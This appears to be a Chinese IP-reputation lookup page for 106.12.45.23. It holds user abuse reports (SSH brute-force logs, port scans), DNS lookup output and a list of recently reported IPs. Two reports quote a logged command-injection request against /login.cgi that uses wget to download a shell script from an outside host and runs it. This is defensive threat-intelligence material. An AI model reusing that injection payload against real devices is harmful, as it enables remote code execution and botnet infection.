106.12.45.23 - IPInfo

基本信息:

城市(city): unknown

省份(region): unknown

国家(country): China

运营商(isp): Beijing Baidu Netcom Science and Technology Co. Ltd.

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): Search Engine Spider

用户上报:

点此参与IP信息讨论

类型	评论内容	时间
attack	MultiHost/MultiPort Probe, Scan, Hack -	2019-07-18 19:15:48
attack	106.12.45.23 - - [17/Jul/2019:18:24:52 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.93.159/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 166 "-" "Hakai/2.0" ...	2019-07-18 07:08:31
attackspambots	106.12.45.23 - - [11/Jul/2019:05:58:42 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.93.159/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 166 "-" "Hakai/2.0" ...	2019-07-11 14:03:00
attack	firewall-block_invalid_GET_Request	2019-07-05 09:17:38
attackspambots	scan z	2019-06-26 02:05:51

相同子网IP讨论:

IP	类型	评论内容	时间
106.12.45.32	attackspam	Sep 20 06:01:31 s158375 sshd[25400]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.32	2020-09-20 21:37:09
106.12.45.32	attackspambots	firewall-block, port(s): 21513/tcp	2020-09-20 13:31:50
106.12.45.32	attackspam	Port scan: Attack repeated for 24 hours	2020-09-20 05:31:27
106.12.45.110	attack	Sep 14 04:48:16 cho sshd[2864902]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110 Sep 14 04:48:16 cho sshd[2864902]: Invalid user kawarada from 106.12.45.110 port 48496 Sep 14 04:48:18 cho sshd[2864902]: Failed password for invalid user kawarada from 106.12.45.110 port 48496 ssh2 Sep 14 04:49:59 cho sshd[2864959]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110 user=root Sep 14 04:50:01 cho sshd[2864959]: Failed password for root from 106.12.45.110 port 40780 ssh2 ...	2020-09-14 17:28:18
106.12.45.110	attack	2020-09-13T13:58:31.788689yoshi.linuxbox.ninja sshd[3254858]: Failed password for root from 106.12.45.110 port 35694 ssh2 2020-09-13T14:00:43.409872yoshi.linuxbox.ninja sshd[3256329]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110 user=root 2020-09-13T14:00:45.844988yoshi.linuxbox.ninja sshd[3256329]: Failed password for root from 106.12.45.110 port 38064 ssh2 ...	2020-09-14 03:14:29
106.12.45.110	attack	Sep 13 01:05:59 web1 sshd\[23350\]: Invalid user ubnt from 106.12.45.110 Sep 13 01:05:59 web1 sshd\[23350\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110 Sep 13 01:06:01 web1 sshd\[23350\]: Failed password for invalid user ubnt from 106.12.45.110 port 50406 ssh2 Sep 13 01:12:24 web1 sshd\[23888\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110 user=root Sep 13 01:12:25 web1 sshd\[23888\]: Failed password for root from 106.12.45.110 port 55278 ssh2	2020-09-13 19:13:02
106.12.45.110	attackbots	Sep 10 10:17:48 vps46666688 sshd[19570]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110 Sep 10 10:17:49 vps46666688 sshd[19570]: Failed password for invalid user gentry from 106.12.45.110 port 58934 ssh2 ...	2020-09-10 23:56:32
106.12.45.110	attackspambots	Sep 10 07:10:55 jumpserver sshd[17533]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110 Sep 10 07:10:55 jumpserver sshd[17533]: Invalid user rtkit from 106.12.45.110 port 53434 Sep 10 07:10:57 jumpserver sshd[17533]: Failed password for invalid user rtkit from 106.12.45.110 port 53434 ssh2 ...	2020-09-10 15:21:09
106.12.45.110	attackspambots	Sep 9 21:10:43 mout sshd[20456]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110 user=root Sep 9 21:10:44 mout sshd[20456]: Failed password for root from 106.12.45.110 port 58562 ssh2	2020-09-10 05:57:23
106.12.45.32	attackbotsspam	firewall-block, port(s): 2167/tcp	2020-09-08 00:16:42
106.12.45.32	attackbots	ET CINS Active Threat Intelligence Poor Reputation IP group 97 - port: 2167 proto: tcp cat: Misc Attackbytes: 60	2020-09-07 15:48:38
106.12.45.32	attackspam	Port Scan ...	2020-09-07 08:10:34
106.12.45.110	attack	Sep 1 05:50:14 ns382633 sshd\[5643\]: Invalid user test from 106.12.45.110 port 42682 Sep 1 05:50:14 ns382633 sshd\[5643\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110 Sep 1 05:50:16 ns382633 sshd\[5643\]: Failed password for invalid user test from 106.12.45.110 port 42682 ssh2 Sep 1 05:54:16 ns382633 sshd\[5932\]: Invalid user tom from 106.12.45.110 port 58056 Sep 1 05:54:16 ns382633 sshd\[5932\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110	2020-09-01 13:49:33
106.12.45.110	attackbots	Aug 31 15:03:41 abendstille sshd\[6274\]: Invalid user atul from 106.12.45.110 Aug 31 15:03:41 abendstille sshd\[6274\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110 Aug 31 15:03:44 abendstille sshd\[6274\]: Failed password for invalid user atul from 106.12.45.110 port 35992 ssh2 Aug 31 15:07:37 abendstille sshd\[10099\]: Invalid user xavier from 106.12.45.110 Aug 31 15:07:37 abendstille sshd\[10099\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.45.110 ...	2020-08-31 23:08:27
106.12.45.32	attackspam	Port scan denied	2020-08-30 03:08:46

WHOIS信息:

DIG信息:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 106.12.45.23
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 29902
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;106.12.45.23.			IN	A

;; AUTHORITY SECTION:
.			2099	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019062501 1800 900 604800 86400

;; Query time: 1 msec
;; SERVER: 67.207.67.2#53(67.207.67.2)
;; WHEN: Wed Jun 26 02:05:43 CST 2019
;; MSG SIZE  rcvd: 116

HOST信息:

Host 23.45.12.106.in-addr.arpa. not found: 3(NXDOMAIN)

NSLOOKUP信息:

Server:		67.207.67.2
Address:	67.207.67.2#53

** server can't find 23.45.12.106.in-addr.arpa: NXDOMAIN

IP	类型	评论内容	时间
176.113.115.252	attackbotsspam	02/06/2020-08:37:41.590159 176.113.115.252 Protocol: 6 ET SCAN NMAP -sS window 1024	2020-02-06 21:45:30
187.134.118.27	attackspam	Honeypot attack, port: 81, PTR: dsl-187-134-118-27-dyn.prod-infinitum.com.mx.	2020-02-06 21:34:18
60.54.120.97	attackspam	Honeypot attack, port: 5555, PTR: PTR record not found	2020-02-06 21:10:27
202.5.54.70	attackbots	email spam	2020-02-06 21:05:53
64.64.104.10	attackbotsspam	US_LogicWeb_<177>1580996091 [1:2403426:55163] ET CINS Active Threat Intelligence Poor Reputation IP TCP group 64 [Classification: Misc Attack] [Priority: 2] {TCP} 64.64.104.10:6861	2020-02-06 21:44:59
162.243.129.151	attackbotsspam	Port Scan detected from 162.243.129.151 (US/United States/zg-0131a-287.stretchoid.com). 4 hits in the last 265 seconds	2020-02-06 21:51:06
183.82.8.165	attackspam	Unauthorized connection attempt from IP address 183.82.8.165 on Port 445(SMB)	2020-02-06 21:28:06
187.0.211.99	attackbotsspam	Feb 6 sshd[10995]: Invalid user xoh from 187.0.211.99 port 56976	2020-02-06 21:11:00
39.59.41.19	attack	Automatic report - SSH Brute-Force Attack	2020-02-06 21:14:41
1.186.99.79	attack	Honeypot attack, port: 81, PTR: 1.186.99.79.dvois.com.	2020-02-06 21:29:35
58.152.152.64	attackbots	Honeypot attack, port: 5555, PTR: n058152152064.netvigator.com.	2020-02-06 21:13:14
167.114.113.141	attack	Unauthorized connection attempt detected from IP address 167.114.113.141 to port 2220 [J]	2020-02-06 21:24:55
176.31.255.223	attackbotsspam	Feb 6 09:56:20 l02a sshd[29728]: Invalid user kju from 176.31.255.223 Feb 6 09:56:20 l02a sshd[29728]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=ns388892.ip-176-31-255.eu Feb 6 09:56:20 l02a sshd[29728]: Invalid user kju from 176.31.255.223 Feb 6 09:56:23 l02a sshd[29728]: Failed password for invalid user kju from 176.31.255.223 port 48334 ssh2	2020-02-06 21:45:51
14.232.208.29	attack	Honeypot attack, port: 445, PTR: static.vnpt.vn.	2020-02-06 21:25:44
116.103.195.112	attack	1580964553 - 02/06/2020 05:49:13 Host: 116.103.195.112/116.103.195.112 Port: 445 TCP Blocked	2020-02-06 21:41:50

最近上报的IP列表

113.121.240.246	196.64.167.5	180.120.192.147	198.143.179.66
95.177.162.153	159.100.24.10	62.133.162.255	114.232.219.221
42.110.202.227	121.226.127.171	195.189.141.50	121.226.62.147
188.166.254.118	202.254.236.13	172.104.172.12	37.142.4.186
192.145.239.52	80.211.3.175	52.249.205.53	93.65.245.164